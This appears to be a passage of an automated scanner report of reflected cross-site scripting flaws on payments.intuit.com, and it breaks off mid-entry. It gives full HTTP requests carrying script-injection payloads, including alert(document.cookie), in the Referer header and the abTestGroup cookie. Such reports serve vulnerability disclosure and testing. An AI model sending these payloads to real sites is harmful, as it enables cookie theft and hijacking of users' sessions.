qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=dceb5'-alert(1)-'94b519c31b1
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=dceb5'-alert(1)-'94b519c31b1'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef888'-alert(1)-'bf789d01126 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/glossary.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=ef888'-alert(1)-'bf789d01126
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=ef888'-alert(1)-'bf789d01126'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 93b01--><script>alert(1)</script>d9ed33811bf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/glossary.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=93b01--><script>alert(1)</script>d9ed33811bf
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262dd"><script>alert(1)</script>f39fea87c00 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?launchHelpMeChoose=true HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16262dd"><script>alert(1)</script>f39fea87c00;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 54b80<script>alert(1)</script>618aff7c52b was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?launchHelpMeChoose=true HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1654b80<script>alert(1)</script>618aff7c52b;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bfc"><script>alert(1)</script>2691f2a62ad was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e3bfc"><script>alert(1)</script>2691f2a62ad;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload b8e7d<script>alert(1)</script>1a9cb1ed9ff was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b8e7d<script>alert(1)</script>1a9cb1ed9ff;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d50dd"><script>alert(1)</script>0da146df87f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d50dd"><script>alert(1)</script>0da146df87f;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 5bab0<script>alert(1)</script>ddd1b3cb4d0 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T165bab0<script>alert(1)</script>ddd1b3cb4d0;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 985ed"><script>alert(1)</script>23bad0dfc93 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/contact-me.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16985ed"><script>alert(1)</script>23bad0dfc93;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload dbc30<script>alert(1)</script>a86e2fa9ef0 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/contact-me.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16dbc30<script>alert(1)</script>a86e2fa9ef0;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 20d8b<script>alert(1)</script>07ae2d24ce9 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1620d8b<script>alert(1)</script>07ae2d24ce9;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880a1"><script>alert(1)</script>9e7870cf12f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16880a1"><script>alert(1)</script>9e7870cf12f;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4c4"><script>alert(1)</script>961eb3d32b2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
